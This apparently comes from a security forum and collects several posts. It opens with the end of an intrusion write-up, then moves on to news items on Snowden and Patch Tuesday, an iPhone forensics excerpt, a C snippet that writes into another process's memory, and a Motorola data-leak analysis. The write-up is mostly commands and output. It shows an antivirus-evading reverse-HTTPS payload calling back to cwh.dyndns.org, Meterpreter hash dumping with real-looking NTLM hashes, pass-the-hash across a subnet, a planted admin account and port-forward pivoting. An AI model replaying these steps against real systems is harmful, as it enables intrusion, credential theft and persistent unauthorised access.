| _\\_ \ | |
| (( ) /====| |
| \ <.__._- \ |
|___________________________________________ <//___. ||

Moving on to our next target, 203.60.240.180, we tried to access it via Terminal Services. Luckily, we were able to log in to the server using the same username and password as on the FTP server ("msec1s", "S1lentM!@#$ec"). Yummy!

Remote Desktop with rdesktop
---------------------------------------------------------------
[zeq3ul@12:56:04]-[~]> rdesktop -u msec1s -p S1lentM!@#$ec 203.60.240.180
---------------------------------------------------------------

Moreover, the "msec1s" account was in an administrator-privileged group. OWNED!

+++++++++++++++++++++++++++++
[0x03c] - Bypass Anti-virus
+++++++++++++++++++++++++++++

Many anti-virus programs work by pattern or signature matching. If a program looks like malware by its appearance, the AV will catch it. If a malicious file has a signature that the AV does not know, the AV will most likely identify the file as clean and harmless.

"Veil, a new payload generator created by security expert and Blackhat USA class instructor Chris Truncer, does just that." -- https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/

We simply picked a payload, used msfvenom shellcode, and chose a reverse HTTPS connection back to our web server (cwh.dyndns.org) with the following choices:

---------------------------------------------------------------
========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
========================================================================

[?] Use msfvenom or supply custom shellcode?

1 - msfvenom (default)
2 - Custom

[>] Please enter the number of your choice: 1
[?] What type of payload would you like?
1 - Reverse TCP
2 - Reverse HTTP
3 - Reverse HTTPS
0 - Main Menu

[>] Please enter the number of your choice: 3
[?] What's the Local Host IP Address: cwh.dyndns.org
[?] What's the Local Port Number: 443
---------------------------------------------------------------

Now we have the payload.exe file. When any Windows system executes this .exe, it will immediately try to connect back to our server.

+++++++++++++++++++++++++++
[0x03d] - PWNED System !!
+++++++++++++++++++++++++++

Time to PWN! As the target server (203.60.240.180) can be accessed via the MSRDP service (on port 3389) and has access to the internet, we could just start a web server on our machine, remote (via MSRDP) into the target server, download our payload (payload.exe), and execute it. The executed Metasploit payload connects a Meterpreter session back (reverse_https) to our server (cwh.dyndns.org).

After that, we wanted to use hashdump to get the LM/NTLM hashes on the server, but this cannot be done right away: if you are on an x64 box and Meterpreter isn't running in an x64 process, it will fail, saying that it doesn't have the correct version offsets (the system is x64 while Meterpreter is x86/win32). So we needed to find a good process to migrate into and work from there. In this case we migrated our process into the winlogon process, which runs as x64. Our console log looked like this:

---------------------------------------------------------------
[zeq3ul@13:16:14]-[~]> sudo msfconsole
[sudo] password for zeq3ul:

Call trans opt: received. 2-19-98 13:18:48 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

  [Metasploit "white rabbit" ASCII art banner]

       http://metasploit.pro

       =[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1113 exploits - 701 auxiliary - 192 post
+ -- --=[ 300 payloads - 29 encoders - 8 nops

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST cwh.dyndns.org
LHOST => cwh.dyndns.org
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://cwh.dyndns.org:443/
msf exploit(handler) > [*] Starting the payload handler...
[*] 203.60.240.180:49160 Request received for /oOTJ...
[*] 203.60.240.180:49160 Staging connection for target /oOTJ received...
[*] Patched user-agent at offset 640488...
[*] Patched transport at offset 640148...
[*] Patched URL at offset 640216...
[*] Patched Expiration Timeout at offset 640748...
[*] Patched Communication Timeout at offset 640752...
[*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 203.60.240.180:49160) at 2013-06-07 13:25:17 +0700

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13 cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : WIN-UUOFVQRLB13
OS : Windows 2008 R2 (Build 7600).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter : x86/win32
meterpreter > ps -S winlogon
Filtering on process name...
Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
384 340 winlogon.exe x86_64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe

meterpreter > migrate 384
[*] Migrating from 1096 to 384...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : WIN-UUOFVQRLB13
OS : Windows 2008 R2 (Build 7600).
Architecture : x64
System Language : en_US
Meterpreter : x64/win64
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY c6b1281c29c15b25cfa14495b66ea816...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
msec1s:1000:aad3b435b51404eeaad3b435b51404ee:73778dadcbb3fbd800e5bb383d5ec1e3:::
---------------------------------------------------------------

Now we have the LM/NTLM hashes for our target (203.60.240.180).

++++++++++++++++++++++++++
[0x03e] - It's Not Over
++++++++++++++++++++++++++

Let's move on to our final mission.

[sailing ship ASCII art]

In the common case, the next thing to do would be to start cracking the hashes we've got for later use. There are many caveats to cracking Windows hashes and it does take some time, so you might as well begin that process ASAP, right? However, there is often no reason to spend time/cycles cracking hashes when you can "PASS THE HASH".

One of the most common ways to "pass the hash" is by using the PSEXEC module (exploit/windows/smb/psexec) in Metasploit. This module executes an arbitrary payload by authenticating to Windows SMB using administrative credentials (password or hash) and creating a Windows service. This is a pretty powerful module in most pen-test toolkits once you get to the point of dumping hashes on a Windows machine.

"Once you use it successfully it will become very apparent that this power could be multiplied by several orders of magnitude if someone wrote a scanning-capable version that accepts an RHOSTS option rather than a single RHOST. Apparently that's what Carlos Perez thought when he wrote psexec_scanner" -- http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html

---------------------------------------------------------------
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use auxiliary/scanner/smb/psexec_scanner
msf auxiliary(psexec_scanner) > show options

Module options (auxiliary/scanner/smb/psexec_scanner):

Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true no Start an Exploit Multi Handler to receive the connection
LHOST yes Local Hosts for payload to connect.
LPORT yes Local Port for payload to connect.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_tcp yes Payload to use against Windows host
RHOSTS yes Range of hosts to scan.
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...)
or a normal read/write folder share SMBDomain WORKGROUP yes SMB Domain SMBPass no SMB Password SMBUser no SMB Username THREADS yes The number of concurrent threads TYPE manual no Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual) msf auxiliary(psexec_scanner) > set LHOST cwh.dyndns.org LHOST => cwh.dyndns.org msf auxiliary(psexec_scanner) > set LPORT 8443 LPORT => 8443 msf auxiliary(psexec_scanner) > set RHOSTS 203.60.240.0/24 RHOSTS => 203.60.240.0/24 msf auxiliary(psexec_scanner) > set SMBUser administrator SMBUser => administrator msf auxiliary(psexec_scanner) > set SMBPass aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 SMBPass => aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 msf auxiliary(psexec_scanner) > set THREADS 10 THREADS => 10 msf auxiliary(psexec_scanner) > exploit [*] Using the username and password provided [*] Starting exploit multi handler [*] Started reverse handler on cwh.dyndns.org:8443 [*] Starting the payload handler... [*] Scanned 031 of 256 hosts (012% complete) [*] Scanned 052 of 256 hosts (020% complete) [*] Scanned 077 of 256 hosts (030% complete) [*] Scanned 111 of 256 hosts (043% complete) [*] Scanned 129 of 256 hosts (050% complete) [*] Scanned 154 of 256 hosts (060% complete) [*] 203.60.240.165:445 - TCP OPEN [*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 [*] 203.60.240.180:445 - TCP OPEN [*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 [*] Connecting to the server... [*] Authenticating to 203.60.240.165:445|WORKGROUP as user 'administrator'... [*] Connecting to the server... [*] Authenticating to 203.60.240.180:445|WORKGROUP as user 'administrator'... [*] Uploading payload... [*] Uploading payload... [*] Created \ExigHylG.exe... [*] Created \xMhdkXDt.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ... [*] Obtaining a service manager handle... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (ZHBMTKgE - "MgHtGamQQzIQxKDJsGWvcgiAStFttWMt")... [*] Creating a new service (qJTBfPjT - "MhIpwSR")... [*] Closing service handle... [*] Closing service handle... [*] Opening service... [*] Opening service... [*] Starting the service... [*] Starting the service... [*] Removing the service... [*] Removing the service... [*] Sending stage (751104 bytes) to 203.60.240.180 [*] Closing service handle... [*] Closing service handle... [*] Deleting \xMhdkXDt.exe... [*] Deleting \ExigHylG.exe... 
[*] Meterpreter session 2 opened (cwh.dyndns.org:8443 -> 203.60.240.180:49161) at 2013-07-02 13:40:42 +0700
[*] Sending stage (751104 bytes) to 203.60.240.165
[*] Meterpreter session 3 opened (cwh.dyndns.org:8443 -> 203.60.240.165:50181) at 2013-07-02 13:42:06 +0700
[*] Scanned 181 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(psexec_scanner) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13 cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WIN-UUOFVQRLB13 cwh.dyndns.org:8443 -> 203.60.240.180:49161 (203.60.240.180)
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WIN-HDO6QC2QVIV cwh.dyndns.org:8443 -> 203.60.240.165:50181 (203.60.240.165)

msf auxiliary(psexec_scanner) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-HDO6QC2QVIV
OS : Windows 2008 R2 (Build 7600).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter : x86/win32
meterpreter > shell
Process 2568 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net user cwh 5plus4=10 /add
net user cwh 5plus4=10 /add
The command completed successfully.

C:\Windows\system32>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.

C:\Windows\system32>exit
---------------------------------------------------------------

So we were able to compromise another machine (203.60.240.165). We typed "netstat -an" to view the open ports on the target and found that Remote Desktop (MSRDP on port 3389) was open, but we could not remote directly to the target because the port was filtered by a firewall. There is, however, a way to bypass this control: the "portfwd" command from the Meterpreter shell.

Portfwd is most commonly used as a pivoting technique, allowing direct access to machines that are otherwise inaccessible from the attacking system. By running this command on a compromised host with access to both the attacker's network and the destination network (or system), we can forward TCP connections through this machine, effectively making it a pivot point - much like the port forwarding technique used with an SSH connection. Portfwd relays TCP connections to and from the connected machines.

---------------------------------------------------------------
meterpreter > portfwd add -l 3389 -r 127.0.0.1 -p 3389
[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389
---------------------------------------------------------------

Lastly, we used rdesktop to connect to the target server (203.60.240.165) through the relay with the following command:

---------------------------------------------------------------
[zeq3ul@14:02:51]-[~]> rdesktop -u cwh -p 5plus4=10 localhost
---------------------------------------------------------------

FULLY COMPROMISED!! GGWP!

####################
[0x04] - Greetz To
####################

Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2, diF, MaYaSeVeN

Special Thx : Exploit-db.com © Offensive Security 2011

Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials
-
[h=1]29C3 29C3 GSM Cell phone network review[/h] Check out the following: Computer Repair and Security @ Dade City, Zephyrhills, and Tampa by SolidShellSecurity, LLC - IT Security Services, Data Recovery, Computer Repair, Web Hosting, and more! (quality dedicated/vps servers and IT services)
-
[h=1]29C3 Ethics in Security Research[/h] Check out the following: Computer Repair and Security @ Dade City, Zephyrhills, and Tampa by SolidShellSecurity, LLC - IT Security Services, Data Recovery, Computer Repair, Web Hosting, and more! (quality dedicated/vps servers and IT services)
-
[h=3]Snowden says, NSA works closely with Germany and other Western states for spying[/h]
Author: Mohit Kumar, The Hacker News - Sunday, July 07, 2013

In an interview to be published this week, NSA whistleblower Edward Snowden said the US National Security Agency works closely with Germany and other Western states. The interview was conducted by US cryptography expert Jacob Appelbaum and documentary filmmaker Laura Poitras using encrypted emails shortly before Snowden became known globally for his whistleblowing.

Snowden said an NSA department known as the Foreign Affairs Directorate coordinates work with foreign secret services. The NSA provides analysis tools for data passing through Germany from regions such as the Middle East. "The partnerships are organized so that authorities in other countries can 'insulate their political leaders from the backlash' if it becomes public 'how grievously they're violating global privacy,'" he said.

Germans are particularly sensitive about eavesdropping because of the intrusive surveillance in the communist German Democratic Republic (GDR) and during the Nazi era.

The US government has revoked the passport of Snowden, a former NSA contractor who is seeking to evade US justice for leaking details about a vast US electronic surveillance programme to collect phone and Internet data. He has been stranded at a Moscow airport for two weeks, but three Latin American countries have now offered him asylum.

Sursa: Snowden says, NSA works closely with Germany and other Western state for spying - The Hacker News
-
[h=3]Microsoft to patch six critical Remote Code Execution vulnerabilities this Tuesday[/h]
Author: Mohit Kumar, The Hacker News - Sunday, July 07, 2013

Microsoft has announced this July's Patch Tuesday line-up, with seven bulletins: one addressing an important kernel privilege-escalation flaw and six addressing critical remote code execution vulnerabilities.

The patches will address vulnerabilities in Microsoft Windows, the .NET Framework and Silverlight, and will apply to all versions of Internet Explorer, from IE6 on Windows XP to IE10 on Windows 8. Often targeted by attackers to perform drive-by malware download attacks, remote code execution flaws allow an attacker to crash an application and launch malware payloads, often without any sort of notification or interaction from the user.

The Windows 8 maker is also patching a kernel vulnerability disclosed at the beginning of June by Google researcher Tavis Ormandy. The issue is in the Windows kernel's EPATHOBJ::pprFlattenRec function (CVE-2013-3660); after Ormandy released exploit code, a Metasploit module was developed to exploit the bug.

The company is planning to release the updates on 9 July. As usual, all fixes will be delivered via the integrated Windows Update, so no user interaction is needed.

Sursa: Microsoft to patch Six critical Remote Code Execution vulnerabilities this Tuesday - The Hacker News
-
[h=4]Following revelations about NSA surveillance, will people rush to download security and privacy software?[/h]

As the U.S. government continues to pursue former NSA contractor Edward Snowden for leaking some of the country’s most sensitive intelligence secrets, the debate over federal surveillance seems to have abated somewhat—despite Snowden’s stated wish for his revelations to spark transformative and wide-ranging debate, it doesn’t seem as if anyone’s taking to the streets to protest the NSA’s reported monitoring of Americans’ emails and phone-call metadata.

But that doesn’t mean privacy is dead: even before the NSA story broke, more and more companies were producing apps designed to eradicate and obfuscate user data, guarding sensitive communications from prying eyes.

Late last year, for example, startup Silent Circle launched software tools for mobile devices to encrypt data while in transit, including PGP email (interoperable with external email clients) and secure video chat; its Burn Notice feature can erase messages and files after a few seconds. In December 2012, Facebook launched Poke, which nukes pictures, text and video after a predetermined amount of time. Poke was the social network’s response to the popular Snapchat, which gives images the ability to self-destruct.

On the enterprise side of the equation, there’s Voltage Security, with a variety of encryption and tokenization tools; Liaison, which traffics in communications and transaction encryption; and, for database security, Application Security. In a recent email to Slashdot, the Electronic Frontier Foundation (EFF) also recommended that the security-conscious consider Tor, HTTPS (Hypertext Transfer Protocol Secure), and host-proof cryptographic platforms such as SpiderOak as methods of locking down sensitive data and communications.

Will the recent revelations about the NSA lead to a spike in demand for sophisticated privacy software, leading to a glut of new apps that vaporize or encrypt data? Will privacy become a hot new segment for developers and startups?

Americans are certainly concerned about privacy. In September 2012, the Pew Research Center’s Internet & American Life Project released a poll suggesting that more than 50 percent of smartphone users had decided not to install a particular app because of concerns over how the software stored and shared personal data. Other surveys have indicated similar worries over sanctity of user data.

However, individual privacy concerns might not be driving investment in privacy and security software—concern over sophisticated hacking of corporate and governmental databases, and the resulting theft of valuable intellectual property, has been powering an uptick in security-related investment since at least early 2012. Tech companies might not care overmuch about your personal data—indeed, shielding your personal data prevents many IT giants from selling ads against it—but they will respond to deep-pocketed businesses’ need for hardened communications and digital storage.

Ultimately, business will be the driver for security and privacy software. It’s just not an exciting topic for most people, who will rush to download the latest iteration of Instagram or Plants vs. Zombies, but who often throw up their hands and profess ignorance when asked about how they lock down their data. Those sophisticated enough—or paranoid enough—will continue to seek out solutions.
But it’s unlikely that privacy is poised to become the next explosive growth opportunity, despite the current headlines. Sursa: Is Privacy the Next Big IT Industry?
-
Huawei and China Mobile Bring LTE TDD to the Top of Mount Everest

[Lhasa, China, July 2, 2013]: Huawei, a leading global information and communications technology (ICT) solutions provider, today announced the successful deployment with China Mobile of 4G coverage atop Mount Everest, 5,200 meters above sea level.

At a June 11 ceremony marking the launch of the service, China Mobile demonstrated a series of new 4G technologies to more than 200 guests, including live HD video streaming from a Mount Everest base camp to the event venue. Huawei has already delivered 4G solutions to other parts of the region, including EPC, integrated equipment rooms, BTS, microwave transmission and 4G devices.

In 2007, Huawei worked with China Mobile and others to realize GSM coverage on Mount Everest to ensure mountain climber safety and to prepare for a leg of the 2008 Olympic Games torch relay. Huawei’s GSM base stations at the Mount Everest base camp have operated smoothly ever since and continue to provide visitors with mobile services.

David Wang, President of Huawei Wireless Networks, said: “Bringing 4G to Mount Everest marks an important milestone in global LTE TDD development. We are very excited to make this possible, and look forward to working with more operators worldwide to bring high-speed mobile broadband services anytime and anywhere.”

As of May 2013, Huawei had deployed LTE TDD solutions for nearly 40 operators in Asia, the Middle East, North America, South America, Western Europe, Russia and Africa.

Sursa: Huawei and China Mobile Bring LTE TDD to the Top of Mount Everest - About Huawei
-
Penetration Testing for iPhone Applications:

iPhone forensics can be performed on the backups made by iTunes or directly on the live device. A previous article on iPhone forensics detailed the forensic techniques and the technical challenges involved in performing live device forensics. Forensic analysis on a live device reboots the phone and may alter the information stored on the device. In critical cases, forensic examiners rely on analyzing iPhone logical backups acquired through iTunes. iTunes uses the AFC (Apple File Connection) protocol to take the backup, and the backup process does not modify anything on the iPhone except the escrow key records.

This article explains the technical procedure and the challenges involved in extracting data and artifacts from iPhone backups. Understanding the forensic techniques used on iTunes backups is also useful in cases where we get physical access to the suspect's computer instead of the iPhone directly. When a computer is used to sync with the iPhone, most of the information on the iPhone is likely to be backed up onto the computer. So, gaining access to the computer's file system also gives access to the mobile device's data.

Note: An iPhone 4 GSM model with iOS 5.0.1 is used for the demos. The backups shown in the article were captured using iTunes 10.6.

Goal: Extracting data and artifacts from the backup without altering any information.

Researchers at Sogeti Labs have released open source forensic tools (with support for iOS 5) to read normal and encrypted iTunes backups. Below are the details outlining their research and an overview of how the backup recovery tools are used.

Backups: With iOS 5, data stored on the iPhone can be backed up to a computer with iTunes or to cloud-based storage with iCloud. This article briefly covers iCloud backups and provides a deep analysis of iTunes backups.

............................................................................

iPhone Forensics – Analysis of iOS 5 backups : Part 1
iPhone Forensics – Analysis of iOS 5 backups : Part 2
Penetration Testing for iPhone Applications – Part 3
Penetration Testing for iPhone Applications – Part 4
Penetration Testing for iPhone Applications – Part 5
-
1. Is this a kind of Kickstarter where the investment is $500?
2. Out of the $500, how much goes to the programmer? Or is that person's work not considered to be "within the project"?
3. Who keeps the copyright for the project if it wins?
4. After a project wins, what happens next? How does it get developed?

These are just a few questions through which I want to make sure everything is in order.
-
A detailed tutorial on how it works would be nice.
-
Yes, the data can be modified. The most practical approach is to allocate memory in the target process (VirtualAllocEx), place the modified data in that buffer, and then use the new data (the pointer you allocated) when the function is called.
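For illustration, here is a minimal C sketch of that idea (the PID and the payload bytes below are placeholder assumptions, and error handling is kept to the essentials):

---------------------------------------------------------------
/* Minimal sketch: place modified data into another process and obtain
 * a pointer that is valid inside that process, e.g. for use at an
 * intercepted function call. PID and data are illustrative. */
#include <windows.h>
#include <stdio.h>

int main(void)
{
    DWORD pid = 1234;                     /* hypothetical target PID */
    const char data[] = "modified data";  /* bytes the callee should see */

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProc) { printf("OpenProcess failed: %lu\n", GetLastError()); return 1; }

    /* Reserve + commit a buffer inside the target process. */
    LPVOID remote = VirtualAllocEx(hProc, NULL, sizeof(data),
                                   MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!remote) { printf("VirtualAllocEx failed: %lu\n", GetLastError()); return 1; }

    /* Copy the modified data into that buffer. */
    SIZE_T written = 0;
    if (!WriteProcessMemory(hProc, remote, data, sizeof(data), &written)) {
        printf("WriteProcessMemory failed: %lu\n", GetLastError());
        return 1;
    }

    /* 'remote' is only meaningful inside the target process; that is the
     * pointer you pass as the argument when the hooked call is made. */
    printf("remote buffer at %p (%lu bytes written)\n", remote, (unsigned long)written);

    CloseHandle(hProc);
    return 0;
}
---------------------------------------------------------------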
-
Motorola Is Listening
article by Ben Lincoln

In June of 2013, I made an interesting discovery about the Android phone (a Motorola Droid X2) which I was using at the time: it was silently sending a considerable amount of sensitive information to Motorola, and to compound the problem, a great deal of it was over an unencrypted HTTP channel.

If you're in a hurry, you can skip straight to the Analysis - email, ActiveSync, and social networking section - that's where the most sensitive information (e.g. email/social network account passwords) is discussed.

Technical notes

The screenshots and other data in this article are more heavily-redacted than I would prefer in the interest of full disclosure and supporting evidence. There are several reasons for this:

- There is a considerable amount of binary, hex-encoded, and base64-encoded data mixed in with the traffic. As I have not performed a full reverse-engineering of the data, it's hard for me to know if any of these values are actually sensitive at this time, or in the future when someone more thoroughly decodes the protocol.
- My employer reminds its employees that publicly identifying themselves as employees of that organization conveys certain responsibilities upon them. I do not speak for my employer, so all information that would indicate who that employer is has been removed.
- I would rather not expose my personal information more than Motorola has already.

Discovery

I was using my personal phone at work to do some testing related to Microsoft Exchange ActiveSync. In order to monitor the traffic, I had configured my phone to proxy all HTTP and HTTPS traffic through Burp Suite Professional - an intercepting proxy that we use for penetration testing - so that I could easily view the contents of the ActiveSync communication. Looking through the proxy history, I saw frequent HTTP connections to ws-cloud112-blur.svcmot.com mixed in with the expected ActiveSync connections.

[Screenshot: ActiveSync configuration information being sent to Motorola's Blur service.]

As of 22 June, 2013, svcmot.com is a domain owned by Motorola, or more specifically:

Motorola Trademark Holdings, LLC
600 North US Highway 45
Attn: Law Department
Libertyville IL 60048
US
internic@motorola.com
+1.8475765000
Fax: +1.8475234348

I was quickly able to determine that the connections to Motorola were triggered every time I updated the ActiveSync configuration on my phone, and that the unencrypted HTTP traffic contained the following data:

- The DNS name of the ActiveSync server (only sent when the configuration is first created).
- The domain name and user ID I specified for authentication.
- The full email address of the account.
- The name of the connection.

As I looked through more of the proxy history, I could see less-frequent connections in which larger chunks of data were sent - for example, a list of all the application shortcuts and widgets on my phone's home screen(s).
Analysis - email, ActiveSync, and social networking

I decided to try setting up each of the other account types that the system would allow me to, and find out what was captured.

Facebook and Twitter

For both of these services, the email address and password for the account are sent to Motorola. Both services support a mechanism (OAuth) explicitly intended to make this unnecessary, but Motorola does not use that more-secure mechanism. The password is only sent over HTTPS, so at least it can't be easily intercepted by most third parties.

Most subsequent connectivity to both services (other than downloading images) is proxied through Motorola's system on the internet using unencrypted HTTP, so Motorola and anyone running a network capture can easily see who your friends/contacts are (including your friends' email addresses), what posts you're reading and writing, and so on. They'll also get a list of which images you're viewing, even though the actual image download comes directly from the source.

[Screenshots: Facebook and Twitter data sent to Motorola's Blur service - Facebook password; Facebook friend information; Facebook wall posts by friend and by self; "Silent Signon"; Twitter password; Twitter following information; Twitter posts, which are also read through Blur. You know your software is trustworthy and has nothing to hide when it has a function called "silent signon".]

Photobucket and Picasa

For both services, the email address and password are sent to Motorola over HTTPS.

For Photobucket, the username and image URLs are sent over unencrypted HTTP. For Picasa, the email address, display name, friend information, and image URLs are sent over unencrypted HTTP.

During my testing of Photobucket, the photo was uploaded through Motorola's system (over HTTPS).
I was not able to successfully upload a photo to Picasa, although it appeared that the same would have been true for that service.

[Screenshots: Photobucket and Picasa data sent to Motorola's Blur service - Photobucket password; Photobucket user ID and friend information; Picasa password; Picasa name and friend information.]

Photo uploads (to Facebook, Photobucket, etc.)

When uploading images, the uploaded image passes through Motorola's Blur servers, and at least some of the time is uploaded with its EXIF data intact. EXIF data is where things like GPS coordinates are stored.

The full path of the original image on the device is also sent to Motorola. For example, /mnt/sdcard/dcim/Camera/2013-06-20_09-00-00_000.jpg. Android devices name phone-camera images using the time they were taken with millisecond resolution, which can almost certainly be used as a unique device identifier for your phone (how many other people were taking a picture at exactly that millisecond?), assuming you leave the original photo on your phone.

[Screenshots: Data sent to Motorola's Blur service when uploading photos - full local path; EXIF data; service username and tags.]
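To see why such a name is effectively a fingerprint, here is a small illustrative sketch (using the example path above) that parses the millisecond-resolution capture time back out of the filename:

---------------------------------------------------------------
/* Minimal sketch: the Android camera filename above encodes the
 * capture time to the millisecond, so two devices are very unlikely
 * to ever produce the same name. */
#include <stdio.h>

int main(void)
{
    const char *name = "2013-06-20_09-00-00_000.jpg";  /* example from above */
    int y, mon, d, h, min, s, ms;

    if (sscanf(name, "%4d-%2d-%2d_%2d-%2d-%2d_%3d",
               &y, &mon, &d, &h, &min, &s, &ms) == 7) {
        printf("captured %04d-%02d-%02d %02d:%02d:%02d.%03d\n",
               y, mon, d, h, min, s, ms);
    }
    return 0;
}
---------------------------------------------------------------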
Youtube

Email address and password are sent to Motorola over HTTPS. The email address is also sent to Motorola over unencrypted HTTP, along with some other data that I haven't deciphered. I didn't have time to create and upload a video, so I'm not sure what else might be sent.

[Screenshots: Youtube data sent to Motorola's Blur service - Youtube password; email address.]

Exchange ActiveSync

Domain name, username, email address, and the name of the connection are sent over unencrypted HTTP. When a new connection is created, the Exchange ActiveSync server's DNS name is also sent.

[Screenshot: Exchange ActiveSync data sent to Motorola's Blur service - EAS initial setup.]

IMAP/POP3 email

Email address, inbound/outbound server names, and the name of the connection are sent over unencrypted HTTP. There is a lot of other encoded/encrypted data included which I haven't deciphered.

[Screenshot: IMAP account data sent to Motorola's Blur service - IMAP configuration. One of the few screenshots I can leave some of the important details visible in - in this case, because the account in question is already on every spam list in the world.]

Yahoo Mail

Email address is sent over unencrypted HTTP. This type of account seems to be handled in at least sort of the correct way by Motorola's software, in that a request is made for an access token, and as far as I can tell, the actual account password is never sent to Motorola.
[Screenshot: Yahoo Mail data sent to Motorola's Blur service - Yahoo Mail address.]

Flickr

Similar to the Yahoo Mail results, but actually one step better - an explicit Flickr prompt appears indicating what permissions Motorola's system is asking for on behalf of the user.

[Screenshot: Flickr permission screen. The Flickr integration behaves the way every other part of Motorola's Blur service should.]

GMail/Google

Interestingly, no data seemed to be sent to Motorola about this type of account. Unfortunately, if anyone adds a Youtube or Picasa account, they've sent their GMail/Google+ credentials to Motorola anyway.

Also interestingly, while testing Picasa and/or Youtube integration, Motorola's methods of authenticating actually tripped Google's suspicious activity alarm. Looking up the source IP in ARIN confirmed the connection was coming from Motorola.

[Screenshots: Google on guard against suspicious vendors - suspicious activity detected; source of the suspicious activity confirmed.]

Firefox sync

No data seems to pass through Motorola's servers.

News / RSS

RSS feeds that are subscribed to using the built-in News application are proxied through Motorola's servers over unencrypted HTTP.
[Screenshot: "RSS / News sync"]

Other data

Every few minutes, my phone sends Motorola a detailed description of my home screen/workspace configuration - all of the shortcuts and widgets I have on it.

[Screenshots - Home screen configuration and other data sent to Motorola's Blur service: "Home screen configuration", "Universal account IDs". "Universal account IDs"? Is that why I only see some data sent the very first time I configure a particular account on my phone?]

Analysis - "check-in" data

As I was looking through the data I've already mentioned, I noticed chunks of "check-in" data being sent as a binary upload, and I thought I'd see if it was in some sort of standard compressed format. As it turns out, it is - the 0x1F8B highlighted below is the header for a block of gzip-compressed data.

[Screenshot - GZip compressed-data header embedded in check-in data: "GZip header (0x1F8B)"]

This data essentially contains debug-level log entries from the device. The battery drain and bandwidth use from having the phone set up like this must be unbelievable. Most of the data that's uploaded is harmless or low-risk on its own - use statistics, and so on. However, this is another mechanism by which Motorola's servers are collecting information like account names/email addresses, and the sheer volume and variety of other data makes me concerned that Motorola's staff apparently care so much about how I'm using my phone. If this were a corporate-owned device, I would expect the owning corporation to have this level of system data collection enabled, but it concerns me that it's being silently collected from my personal device, and that there is no way to disable it.

Information that is definitely being collected

- The IMEI and IMSI of the phone.
  These are referred to as MEID and MIN in the phone's UI and on the label in the battery compartment, but IMEI and IMSI in the logs. I believe these two values are all that's needed to clone a phone, if someone were to intercept the traffic.
- The phone number of the phone, and carrier information (e.g. Verizon).
- The barcode from inside the battery compartment.
- Applications included with the device as well as installed by the user.
